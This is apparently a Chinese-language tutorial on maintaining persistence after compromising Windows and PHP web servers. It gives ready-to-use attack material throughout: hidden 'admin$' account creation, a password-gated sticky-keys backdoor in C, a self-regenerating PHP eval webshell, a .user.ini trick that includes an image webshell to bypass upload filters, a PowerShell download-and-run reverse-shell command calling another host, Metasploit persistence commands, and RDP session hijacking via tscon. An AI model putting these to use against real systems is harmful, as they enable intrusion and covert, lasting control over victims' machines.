后渗透权限维持的方法

一、影子账户

net user admin$ admin /add

具体可以通过注册表查找
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names
在默认情况下，隐藏用户的查看是隐藏的。

解决方法：在SAM文件夹处点击右键—>权限（设置就好了）

---

二、shift后门
1、先删除缓存C:\WINDOWS\system32\dllcache\sethc.exe
2、C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe
代码：

#include<cstdio>
#include<cstring>
#include<cstdlib>
#include<conio.h>
int main(void)
{
    char welcome[1700] = " \n\
    Please input your password! \n\
    password : ";
    while(1){
        char password[30];
        char pwd[30] = "adexx!@#QWE";
        printf("%s",welcome);
        puts("");
        printf("你输入的密码:");
        scanf("%s",password);
        if(strncmp(password,pwd,11) == 0){
            system("cmd.exe");
        }else{
            printf("%s","Error\n");
            fflush(stdin);
        }
    }
    return 0;
}

注. 这里种shift后门目标是2008的机器的话 那么可以用2003的远程连接工具进行连接

---

三、不死马（web层面的权限维持）

1、事先隐藏后门文件操作：右键-》属性-》隐藏

2、将木马名字进行伪装处理，伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。

3、利用循环不死马（举栗子）

<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
	file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");
	$b=array_keys($a)[0];
	eval($b);?>');
	sleep(8);
}
?>

说明：此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马.

---

四：利用.user.ini文件自动包含木马文件

利用成功前提下必须有以下三个文件，
1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马

创建一个文件夹test
1、test.php 内容为 <?php echo 1;?>

2、luomiweixiong.gif 内容为<?php if(@$_GET['shell']=='test'){phpinfo();}?>

3、在“.user.ini”文件写入： auto_prepend_file=luomiweixiong.gif

浏览器访问：http://127.0.0.1/test/test.php?shell=test
则出现的为phpinfo()函数执行的效果

原理：
https://www.php.net/manual/zh/configuration.file.per-user.php

在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别

这里就很清楚了，.user.ini实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。（上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置）

实际上 这里面没有说完整，其实除了PHP_INI_SYSTEM以外的模式（包括PHP_INI_ALL）都是可以通过.user.ini来设置的。

其中有个配置项auto_prepend_file就可以被利用导致后门的生成

auto_prepend_file：指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。而auto_append_file类似，只是在文件后面包含。 使用方法很简单，直接写在.user.ini中

隐藏知识：某网站限制不允许上传.php文件，你便可以上传一个.user.ini，再上传一个图片马，包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件，否则也不能包含了。 再比如，你只是想隐藏个后门，这个方式是最方便的。

---

五、Powershell权限维持
参考此PowerShell脚本
https://github.com/re4lity/Schtasks-Backdoor

执行代码：powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"

说明：
1、192.168.124.25为受害者IP,前提是要把PowerShell脚本放到受害者服务器能访问到的根路径。
2、192.168.124.14为接收反弹回来的IP,可用NC监听反弹回来的shell

---

六、metasploit权限维持（老生常谈直接操作就好了哈）

1、Persistence模块
前提是利用MSF获取到了对方的会话
run persistence -U -i 12 -p 6666 -r 192.168.124.14

说明
-i 目标自动回连时间
-p 设置目标反向连接的端口
-r 设置目标反向连接的ip地址
-U 设置目标自启动
加入自启动后，就算受害者机器再次启动也能弹回shell

2、metsvc 模块
前提是利用MSF获取到了对方的会话
run metsvc -A

说明：

-A 自动启动一个匹配的 multi/handler 以连接到该服务
该模块是在受害者服务器开启了一个“Meterpreter”服务
下次攻击者可以利用metsvc_bind_tcp监听模块就可以再次获取到shell
监听端口为31337

---

七、会话劫持

说明：RDP会话劫持是在不知道另一用户密码的条件下进行切换用户登录

query user
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"
net start sesshijack

tscon 参数为query user命令中的所要劫持ID参数
dest: 为你当前用户的会话名